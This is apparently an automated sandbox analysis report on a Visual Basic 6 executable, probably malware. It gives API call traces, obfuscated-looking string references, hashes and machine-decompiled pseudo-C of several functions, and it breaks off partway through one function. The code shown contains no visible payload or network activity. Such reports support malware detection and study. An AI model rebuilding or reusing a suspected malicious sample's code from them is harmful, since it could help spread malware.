__vbaFreeVarList.MSVBVM60(00000005,00000002,00000002,00000002,00000002,?), ref: 00414B21
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00414B4B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414B84
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA9C,00000060), ref: 00414BCB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040E734,00000084), ref: 00414C43
__vbaFreeObj.MSVBVM60(00000000,?,0040E734,00000084), ref: 00414C5A
__vbaVarDup.MSVBVM60 ref: 00414C73
#542.MSVBVM60(?,?), ref: 00414C80
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00414CA4
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00414CBA
__vbaChkstk.MSVBVM60 ref: 00414CF6
__vbaChkstk.MSVBVM60 ref: 00414D0A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040E734,000002B0), ref: 00414D4A
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00414D71
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414DAA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EB90,000000C4), ref: 00414DF0
__vbaFreeObj.MSVBVM60(00000000,?,0040EB90,000000C4), ref: 00414E07
__vbaFreeStr.MSVBVM60(00414E53), ref: 00414E4D

Strings

c, xrefs: 00414A7E
p"w, xrefs: 00414B38, 00414B41, 00414B50, 00414B5C, 00414D5E, 00414D67, 00414D76, 00414D82
d, xrefs: 00414A97
3/3/3, xrefs: 00414C5F

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Chkstk$ListNew2$#542#581#664Copy
String ID: 3/3/3$c$d$p"w
API String ID: 4034158199-3802092610
Opcode ID: 0b6310f0091efef1c628bb043bbb2357907f32031cee4f387bfb0b4f02e95a8f
Instruction ID: 3fee41086fa0bc70ec129aa059a84caa690495caab883345c790101dca5d98ea
Opcode Fuzzy Hash: 0b6310f0091efef1c628bb043bbb2357907f32031cee4f387bfb0b4f02e95a8f
Instruction Fuzzy Hash: 2EB10971900228DBDB11EF91CC85BDEB7B9FF08304F1085AAE109BB1A1DB795A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00415D00, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00415D00(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				long long _v36;
				void* _v40;
				intOrPtr _v48;
				char _v56;
				signed int _v80;
				char _v88;
				signed int _v92;
				signed long long _v104;
				signed int _v108;
				signed int _v112;
				signed int _t61;
				signed int _t62;
				char* _t63;
				signed int _t64;
				void* _t82;
				void* _t84;
				intOrPtr _t85;

				_t85 = _t84 - 0xc;
				 *[fs:0x0] = _t85;
				L004015E0();
				_v16 = _t85;
				_v12 = 0x401410;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x4015e6, _t82);
				L00401820();
				_push(L"Bastardiseret");
				_push(L"Blodserummers9");
				_push( &_v56); // executed
				L00401730(); // executed
				_v80 = _v80 & 0x00000000;
				_v88 = 0x8008;
				_push( &_v56);
				_t61 =  &_v88;
				_push(_t61);
				L00401796();
				_v92 = _t61;
				L00401838();
				_t62 = _v92;
				if(_t62 == 0) {
					L9:
					_push(0);
					_push(1);
					L00401724();
					L00401814();
					L00401718();
					_v48 = _t62;
					_v56 = 8;
					_t63 =  &_v56;
					_push(_t63);
					L0040171E();
					_v92 =  ~(0 | _t63 != 0x0000ffff);
					L00401838();
					_t64 = _v92;
					if(_t64 != 0) {
						L0040172A();
						_t64 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t64);
						asm("fclex");
						_v92 = _t64;
						if(_v92 >= 0) {
							_v112 = _v112 & 0x00000000;
						} else {
							_push(0x64);
							_push(0x40e734);
							_push(_a4);
							_push(_v92);
							L00401856();
							_v112 = _t64;
						}
					}
					_v36 =  *0x4013c8;
					asm("wait");
					_push(0x415f06);
					L0040182C();
					L0040182C();
					return _t64;
				} else {
					__fp0 =  *0x401408;
					_push(__ecx);
					 *__esp =  *0x401408;
					__fp0 =  *0x401400;
					__fp0 =  *0x401400 *  *0x4013f8;
					if( *0x41b000 != 0) {
						_push( *0x401384);
						_push( *0x401380);
						L00401604();
					} else {
						__fp0 = __fp0 /  *0x401380;
					}
					asm("fnstsw ax");
					if((__al & 0x0000000d) != 0) {
						goto L1;
					} else {
						_v104 = __fp0;
						__fp0 = _v104;
						 *__esp = _v104;
						__fp0 =  *0x4013f0;
						_v80 =  *0x4013f0;
						__fp0 =  *0x4013e8;
						L0040172A();
						__fp0 =  *0x4013e0;
						_v88 =  *0x4013e0;
						__fp0 =  *0x4013dc;
						_v92 =  *0x4013dc;
						__fp0 =  *0x4013d8;
						 *__esp =  *0x4013d8;
						_a4 =  *_a4;
						__eax =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, __ecx, __ecx, __ecx, __eax, __ecx, __ecx);
						asm("fclex");
						_v92 = __eax;
						if(_v92 >= 0) {
							_v108 = _v108 & 0x00000000;
						} else {
							_push(0x2c0);
							_push(0x40e734);
							_push(_a4);
							_push(_v92);
							L00401856();
							_v108 = __eax;
						}
						goto L9;
					}
				}
				L1:
				return __imp____vbaFPException();
			}

0x00415d03
0x00415d12
0x00415d1c
0x00415d24
0x00415d27
0x00415d2e
0x00415d3d
0x00415d46
0x00415d4b
0x00415d50
0x00415d58
0x00415d59
0x00415d5e
0x00415d62
0x00415d6c
0x00415d6d
0x00415d70
0x00415d71
0x00415d76
0x00415d7d
0x00415d82
0x00415d88
0x00415e4a
0x00415e4a
0x00415e4c
0x00415e4e
0x00415e58
0x00415e5d
0x00415e62
0x00415e65
0x00415e6c
0x00415e6f
0x00415e70
0x00415e80
0x00415e87
0x00415e8c
0x00415e92
0x00415e9a
0x00415ea8
0x00415eab
0x00415ead
0x00415eb4
0x00415ecd
0x00415eb6
0x00415eb6
0x00415eb8
0x00415ebd
0x00415ec0
0x00415ec3
0x00415ec8
0x00415ec8
0x00415eb4
0x00415ed7
0x00415eda
0x00415edb
0x00415ef8
0x00415f00
0x00415f05
0x00415d8e
0x00415d8e
0x00415d94
0x00415d95
0x00415d98
0x00415d9e
0x00415dab
0x00415db5
0x00415dbb
0x00415dc1
0x00415dad
0x00415dad
0x00415dad
0x00415dc6
0x00415dca
0x00000000
0x00415dd0
0x00415dd0
0x00415dd3
0x00415dd7
0x00415dda
0x00415de1
0x00415de4
0x00415dea
0x00415df0
0x00415df7
0x00415dfa
0x00415e01
0x00415e04
0x00415e0b
0x00415e16
0x00415e1b
0x00415e21
0x00415e23
0x00415e2a
0x00415e46
0x00415e2c
0x00415e2c
0x00415e31
0x00415e36
0x00415e39
0x00415e3c
0x00415e41
0x00415e41
0x00000000
0x00415e2a
0x00415dca
0x004015ec
0x004015ec

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00415D1C
__vbaStrCopy.MSVBVM60(?,?,?,?,004015E6), ref: 00415D46
#692.MSVBVM60(?,Blodserummers9,Bastardiseret,?,?,?,?,004015E6), ref: 00415D59
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 00415D71
__vbaFreeVar.MSVBVM60(00008008,?), ref: 00415D7D
_adj_fdiv_m64.MSVBVM60(?,00008008,?), ref: 00415DC1
__vbaFpI4.MSVBVM60(?,?,?,00008008,?), ref: 00415DEA
__vbaHresultCheckObj.MSVBVM60(00000000,00401410,0040E734,000002C0,?,?,?,00000000,?,?,?,00008008,?), ref: 00415E3C
#707.MSVBVM60(00000001,00000000,00008008,?), ref: 00415E4E
__vbaStrMove.MSVBVM60(00000001,00000000,00008008,?), ref: 00415E58
#609.MSVBVM60(00000001,00000000,00008008,?), ref: 00415E5D
#557.MSVBVM60(00000008,00000001,00000000,00008008,?), ref: 00415E70
__vbaFreeVar.MSVBVM60(00000008,00000001,00000000,00008008,?), ref: 00415E87
__vbaFpI4.MSVBVM60(00000008,00000001,00000000,00008008,?), ref: 00415E9A
__vbaHresultCheckObj.MSVBVM60(?,00401410,0040E734,00000064), ref: 00415EC3
__vbaFreeStr.MSVBVM60(00415F06,00000008,00000001,00000000,00008008,?), ref: 00415EF8
__vbaFreeStr.MSVBVM60(00415F06,00000008,00000001,00000000,00008008,?), ref: 00415F00

Strings

Bastardiseret, xrefs: 00415D4B
Blodserummers9, xrefs: 00415D50

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#557#609#692#707ChkstkCopyMove_adj_fdiv_m64
String ID: Bastardiseret$Blodserummers9
API String ID: 598853882-659068624
Opcode ID: fae87bd8520686073997a2291368e89b19a9c5ec7e9a427b8c76f26771ae4c5a
Instruction ID: 0af03a280c3df1eaee3dfdd8ffecf30c22966d948b4313e1c2dbe31d7526124c
Opcode Fuzzy Hash: fae87bd8520686073997a2291368e89b19a9c5ec7e9a427b8c76f26771ae4c5a
Instruction Fuzzy Hash: 0D513671900648EBDB05AFA1D989BEDBBB4FF04744F10847AF441BA1A0DB788A95CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401888, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040188D

Strings

VB5!6&*, xrefs: 00401888

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 33d3809462acbf7464863223be7a4958d094f2f1cd466ebfe03ba315e8e715bc
Instruction ID: e650ccd77705b3717a2cc767fd4379df247c8e275b30cb941e8e80e022b368bb
Opcode Fuzzy Hash: 33d3809462acbf7464863223be7a4958d094f2f1cd466ebfe03ba315e8e715bc
Instruction Fuzzy Hash: 124193A640E7C00FC70387709E216817FB0AE13264B1E86DBC4C5DF1F3E6690A0AD76A

Uniqueness

Uniqueness Score: -1.00%

Function 005D2613, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.798588214.00000000005D0000.00000020.00000001.sdmp, Offset: 005D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd9f91644a4662431945a3322a65882b726704af659b9b8a3bd05dc35bc31c70
Instruction ID: 4680ffe2bf396cd1c02588ff5e57b79e156e196a4139a098153f669ed4c37813
Opcode Fuzzy Hash: dd9f91644a4662431945a3322a65882b726704af659b9b8a3bd05dc35bc31c70
Instruction Fuzzy Hash: E2D05EB130E240AFD3089A248E116963BF0EB42210F0908EBE404CB282E625EC068722

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00417AB6, Relevance: 73.9, APIs: 39, Strings: 3, Instructions: 426
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00417AB6(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				short _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				char _v44;
				char _v48;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char* _v76;
				intOrPtr _v84;
				char* _v92;
				intOrPtr _v100;
				char* _v108;
				intOrPtr _v116;
				intOrPtr _v124;
				intOrPtr _v132;
				intOrPtr _v140;
				intOrPtr _v148;
				void* _v168;
				char _v172;
				char _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				intOrPtr* _v196;
				signed int _v200;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				signed int _v228;
				intOrPtr* _v232;
				signed int _v236;
				intOrPtr* _v240;
				signed int _v244;
				intOrPtr* _v248;
				signed int _v252;
				intOrPtr* _v256;
				char _v260;
				intOrPtr _v264;
				signed int _v268;
				intOrPtr* _v272;
				signed int _v276;
				signed int _t192;
				signed int _t196;
				char _t197;
				signed int _t201;
				signed int _t205;
				char* _t209;
				signed int _t216;
				signed int _t222;
				signed int _t226;
				short _t227;
				signed int _t231;
				signed int _t235;
				char* _t239;
				signed int _t243;
				signed int _t256;
				intOrPtr _t269;
				void* _t304;
				void* _t306;
				intOrPtr* _t307;
				intOrPtr _t326;

				_t326 = __fp0;
				_t307 = _t306 - 0xc;
				 *[fs:0x0] = _t307;
				L004015E0();
				_v16 = _t307;
				_v12 = 0x4014f0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4015e6, _t304);
				L00401820();
				_t192 =  *((intOrPtr*)( *_a4 + 0x114))(_a4, 1);
				asm("fclex");
				_v180 = _t192;
				if(_v180 >= 0) {
					_v216 = _v216 & 0x00000000;
				} else {
					_push(0x114);
					_push(0x40e734);
					_push(_a4);
					_push(_v180);
					L00401856();
					_v216 = _t192;
				}
				_t196 =  *((intOrPtr*)( *_a4 + 0x110))(_a4,  &_v168);
				asm("fclex");
				_v180 = _t196;
				if(_v180 >= 0) {
					_v220 = _v220 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x40e734);
					_push(_a4);
					_push(_v180);
					L00401856();
					_v220 = _t196;
				}
				_t197 = _v168;
				if(_t197 == _v36) {
					_push(L"Agnew");
					L004017CC();
				}
				_push(1);
				L004016B8();
				if(_t197 != 0x800000) {
					if( *0x41b010 != 0) {
						_v224 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v224 = 0x41b010;
					}
					_t231 =  &_v44;
					L00401862();
					_v180 = _t231;
					_t235 =  *((intOrPtr*)( *_v180 + 0x58))(_v180,  &_v172, _t231,  *((intOrPtr*)( *((intOrPtr*)( *_v224)) + 0x310))( *_v224));
					asm("fclex");
					_v184 = _t235;
					if(_v184 >= 0) {
						_v228 = _v228 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x40eb10);
						_push(_v180);
						_push(_v184);
						L00401856();
						_v228 = _t235;
					}
					if( *0x41b010 != 0) {
						_v232 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v232 = 0x41b010;
					}
					_t239 =  &_v48;
					L00401862();
					_v188 = _t239;
					_t243 =  *((intOrPtr*)( *_v188 + 0x1c0))(_v188,  &_v176, _t239,  *((intOrPtr*)( *((intOrPtr*)( *_v232)) + 0x328))( *_v232));
					asm("fclex");
					_v192 = _t243;
					if(_v192 >= 0) {
						_v236 = _v236 & 0x00000000;
					} else {
						_push(0x1c0);
						_push(0x40ea9c);
						_push(_v188);
						_push(_v192);
						L00401856();
						_v236 = _t243;
					}
					if( *0x41b2d4 != 0) {
						_v240 = 0x41b2d4;
					} else {
						_push(0x41b2d4);
						_push(0x40ed14);
						L0040185C();
						_v240 = 0x41b2d4;
					}
					_v196 =  *_v240;
					_v140 = _v176;
					_v148 = 3;
					_v124 = _v172;
					_v132 = 3;
					_v108 = 0x18;
					_v116 = 2;
					_v92 = 0xd137a;
					_v100 = 3;
					_v76 = L"Bortkastelsen";
					_v84 = 8;
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t256 =  *((intOrPtr*)( *_v196 + 0x44))(_v196, 0x10, 0x10, 0x10, 0x10, 0x10,  &_v52);
					asm("fclex");
					_v200 = _t256;
					if(_v200 >= 0) {
						_v244 = _v244 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x40ed04);
						_push(_v196);
						_push(_v200);
						L00401856();
						_v244 = _t256;
					}
					_v212 = _v52;
					_v52 = _v52 & 0x00000000;
					_v60 = _v212;
					_v68 = 9;
					_push(0x10);
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v32);
					L004016B2();
					_push( &_v48);
					_push( &_v44);
					_push(2);
					L00401826();
					_t307 = _t307 + 0xc;
					L00401838();
				}
				if( *0x41b010 != 0) {
					_v248 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v248 = 0x41b010;
				}
				_t201 =  &_v44;
				L00401862();
				_v180 = _t201;
				_t205 =  *((intOrPtr*)( *_v180 + 0xe0))(_v180,  &_v168, _t201,  *((intOrPtr*)( *((intOrPtr*)( *_v248)) + 0x328))( *_v248));
				asm("fclex");
				_v184 = _t205;
				if(_v184 >= 0) {
					_v252 = _v252 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x40ea9c);
					_push(_v180);
					_push(_v184);
					L00401856();
					_v252 = _t205;
				}
				if( *0x41b010 != 0) {
					_v256 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v256 = 0x41b010;
				}
				_t269 =  *((intOrPtr*)( *_v256));
				_t209 =  &_v48;
				L00401862();
				_v188 = _t209;
				_v108 = 0x80020004;
				_v116 = 0xa;
				_v92 = 0x80020004;
				_v100 = 0xa;
				_v76 = 0x80020004;
				_v84 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v260 = _v168;
				asm("fild dword [ebp-0x100]");
				_v264 = _t326;
				 *_t307 = _v264;
				_t216 =  *((intOrPtr*)( *_v188 + 0x178))(_v188, _t269, 0x10, 0x10, 0x10, _t209,  *((intOrPtr*)(_t269 + 0x334))( *_v256));
				asm("fclex");
				_v192 = _t216;
				if(_v192 >= 0) {
					_v268 = _v268 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40eae4);
					_push(_v188);
					_push(_v192);
					L00401856();
					_v268 = _t216;
				}
				_push( &_v48);
				_push( &_v44);
				_push(2);
				L00401826();
				if( *0x41b010 != 0) {
					_v272 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v272 = 0x41b010;
				}
				_t222 =  &_v44;
				L00401862();
				_v180 = _t222;
				_t226 =  *((intOrPtr*)( *_v180 + 0xe0))(_v180,  &_v168, _t222,  *((intOrPtr*)( *((intOrPtr*)( *_v272)) + 0x350))( *_v272));
				asm("fclex");
				_v184 = _t226;
				if(_v184 >= 0) {
					_v276 = _v276 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x40eac4);
					_push(_v180);
					_push(_v184);
					L00401856();
					_v276 = _t226;
				}
				_t227 = _v168;
				_v28 = _t227;
				L00401850();
				asm("wait");
				_push(0x418175);
				L00401850();
				L0040182C();
				return _t227;
			}

0x00417ab6
0x00417ab9
0x00417ac8
0x00417ad4
0x00417adc
0x00417adf
0x00417ae6
0x00417af5
0x00417afe
0x00417b0d
0x00417b13
0x00417b15
0x00417b22
0x00417b44
0x00417b24
0x00417b24
0x00417b29
0x00417b2e
0x00417b31
0x00417b37
0x00417b3c
0x00417b3c
0x00417b5a
0x00417b60
0x00417b62
0x00417b6f
0x00417b91
0x00417b71
0x00417b71
0x00417b76
0x00417b7b
0x00417b7e
0x00417b84
0x00417b89
0x00417b89
0x00417b98
0x00417ba3
0x00417ba5
0x00417baa
0x00417baa
0x00417baf
0x00417bb1
0x00417bbb
0x00417bc8
0x00417be5
0x00417bca
0x00417bca
0x00417bcf
0x00417bd4
0x00417bd9
0x00417bd9
0x00417c09
0x00417c0d
0x00417c12
0x00417c2d
0x00417c30
0x00417c32
0x00417c3f
0x00417c61
0x00417c41
0x00417c41
0x00417c43
0x00417c48
0x00417c4e
0x00417c54
0x00417c59
0x00417c59
0x00417c6f
0x00417c8c
0x00417c71
0x00417c71
0x00417c76
0x00417c7b
0x00417c80
0x00417c80
0x00417cb0
0x00417cb4
0x00417cb9
0x00417cd4
0x00417cda
0x00417cdc
0x00417ce9
0x00417d0e
0x00417ceb
0x00417ceb
0x00417cf0
0x00417cf5
0x00417cfb
0x00417d01
0x00417d06
0x00417d06
0x00417d1c
0x00417d39
0x00417d1e
0x00417d1e
0x00417d23
0x00417d28
0x00417d2d
0x00417d2d
0x00417d4b
0x00417d57
0x00417d5d
0x00417d6d
0x00417d70
0x00417d77
0x00417d7e
0x00417d85
0x00417d8c
0x00417d93
0x00417d9a
0x00417da8
0x00417db5
0x00417db6
0x00417db7
0x00417db8
0x00417dbc
0x00417dc6
0x00417dc7
0x00417dc8
0x00417dc9
0x00417dcd
0x00417dd7
0x00417dd8
0x00417dd9
0x00417dda
0x00417dde
0x00417de8
0x00417de9
0x00417dea
0x00417deb
0x00417def
0x00417df9
0x00417dfa
0x00417dfb
0x00417dfc
0x00417e0b
0x00417e0e
0x00417e10
0x00417e1d
0x00417e3f
0x00417e1f
0x00417e1f
0x00417e21
0x00417e26
0x00417e2c
0x00417e32
0x00417e37
0x00417e37
0x00417e49
0x00417e4f
0x00417e59
0x00417e5c
0x00417e63
0x00417e66
0x00417e70
0x00417e71
0x00417e72
0x00417e73
0x00417e74
0x00417e76
0x00417e79
0x00417e81
0x00417e85
0x00417e86
0x00417e88
0x00417e8d
0x00417e93
0x00417e93
0x00417e9f
0x00417ebc
0x00417ea1
0x00417ea1
0x00417ea6
0x00417eab
0x00417eb0
0x00417eb0
0x00417ee0
0x00417ee4
0x00417ee9
0x00417f04
0x00417f0a
0x00417f0c
0x00417f19
0x00417f3e
0x00417f1b
0x00417f1b
0x00417f20
0x00417f25
0x00417f2b
0x00417f31
0x00417f36
0x00417f36
0x00417f4c
0x00417f69
0x00417f4e
0x00417f4e
0x00417f53
0x00417f58
0x00417f5d
0x00417f5d
0x00417f83
0x00417f8d
0x00417f91
0x00417f96
0x00417f9c
0x00417fa3
0x00417faa
0x00417fb1
0x00417fb8
0x00417fbf
0x00417fc9
0x00417fd3
0x00417fd4
0x00417fd5
0x00417fd6
0x00417fda
0x00417fe4
0x00417fe5
0x00417fe6
0x00417fe7
0x00417feb
0x00417ff5
0x00417ff6
0x00417ff7
0x00417ff8
0x00418000
0x00418006
0x0041800c
0x00418019
0x0041802a
0x00418030
0x00418032
0x0041803f
0x00418064
0x00418041
0x00418041
0x00418046
0x0041804b
0x00418051
0x00418057
0x0041805c
0x0041805c
0x0041806e
0x00418072
0x00418073
0x00418075
0x00418084
0x004180a1
0x00418086
0x00418086
0x0041808b
0x00418090
0x00418095
0x00418095
0x004180c5
0x004180c9
0x004180ce
0x004180e9
0x004180ef
0x004180f1
0x004180fe
0x00418123
0x00418100
0x00418100
0x00418105
0x0041810a
0x00418110
0x00418116
0x0041811b
0x0041811b
0x0041812a
0x00418131
0x00418138
0x0041813d
0x0041813e
0x00418167
0x0041816f
0x00418174

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00417AD4
__vbaStrCopy.MSVBVM60(?,?,?,?,004015E6), ref: 00417AFE
__vbaHresultCheckObj.MSVBVM60(00000000,004014F0,0040E734,00000114), ref: 00417B37
__vbaHresultCheckObj.MSVBVM60(00000000,004014F0,0040E734,00000110), ref: 00417B84
#532.MSVBVM60(Agnew), ref: 00417BAA
#589.MSVBVM60(00000001), ref: 00417BB1
__vbaNew2.MSVBVM60(0040F3CC,p"w,00000001), ref: 00417BD4
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417C0D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040EB10,00000058), ref: 00417C54
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00417C7B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417CB4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA9C,000001C0), ref: 00417D01
__vbaNew2.MSVBVM60(0040ED14,0041B2D4), ref: 00417D28
__vbaChkstk.MSVBVM60(?), ref: 00417DA8
__vbaChkstk.MSVBVM60(?), ref: 00417DBC
__vbaChkstk.MSVBVM60(?), ref: 00417DCD
__vbaChkstk.MSVBVM60(?), ref: 00417DDE
__vbaChkstk.MSVBVM60(?), ref: 00417DEF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED04,00000044), ref: 00417E32
__vbaChkstk.MSVBVM60(00000000,?,0040ED04,00000044), ref: 00417E66
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 00417E79
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,00000000), ref: 00417E88
__vbaFreeVar.MSVBVM60(?,?,004015E6), ref: 00417E93
__vbaNew2.MSVBVM60(0040F3CC,p"w,00000001), ref: 00417EAB
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00000001), ref: 00417EE4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040EA9C,000000E0,?,?,?,?,?,?,?,00000001), ref: 00417F31
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,?,?,?,00000001), ref: 00417F58
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,00000001), ref: 00417F91
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,00000001), ref: 00417FC9
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,00000001), ref: 00417FDA
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,00000001), ref: 00417FEB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,00000178,?,?,00000000), ref: 00418057
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000001), ref: 00418075
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,004015E6), ref: 00418090
__vbaObjSet.MSVBVM60(?,00000000), ref: 004180C9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAC4,000000E0), ref: 00418116
__vbaFreeObj.MSVBVM60(00000000,?,0040EAC4,000000E0), ref: 00418138
__vbaFreeObj.MSVBVM60(00418175), ref: 00418167
__vbaFreeStr.MSVBVM60(00418175), ref: 0041816F

Strings

p"w, xrefs: 00417BC1, 00417BCA, 00417BD9, 00417BE5, 00417C68, 00417C71, 00417C80, 00417C8C, 00417E98, 00417EA1, 00417EB0, 00417EBC, 00417F45, 00417F4E, 00417F5D, 00417F69, 0041807D, 00418086, 00418095, 004180A1
Agnew, xrefs: 00417BA5
Bortkastelsen, xrefs: 00417D93

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckHresult$FreeNew2$List$#532#589CopyLate
String ID: Agnew$Bortkastelsen$p"w
API String ID: 1195200875-2591644601
Opcode ID: 7fdb9554ab1e4139ad7461eda8b6208f0d735dce9843043f3694f4cdf75c56cb
Instruction ID: cbecc03aa98744a16b8f1bb4fc9a51c7b781db4df096b0c8f6a025f29cc54421
Opcode Fuzzy Hash: 7fdb9554ab1e4139ad7461eda8b6208f0d735dce9843043f3694f4cdf75c56cb
Instruction Fuzzy Hash: 6D021571900218DFDB21EF90CC45BDABBB6FF08304F1044AAE509BB2A1D7B95A84DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004190C3, Relevance: 72.1, APIs: 40, Strings: 1, Instructions: 354
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E004190C3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v36;
				char _v48;
				void* _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v84;
				char* _v92;
				char _v100;
				signed int _v108;
				intOrPtr _v116;
				char _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr* _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				intOrPtr* _v196;
				signed int _v200;
				intOrPtr* _v204;
				signed int _v208;
				signed int _t167;
				signed int _t170;
				signed int _t171;
				signed int _t176;
				signed int _t184;
				signed int _t187;
				signed int _t191;
				signed int _t195;
				char* _t196;
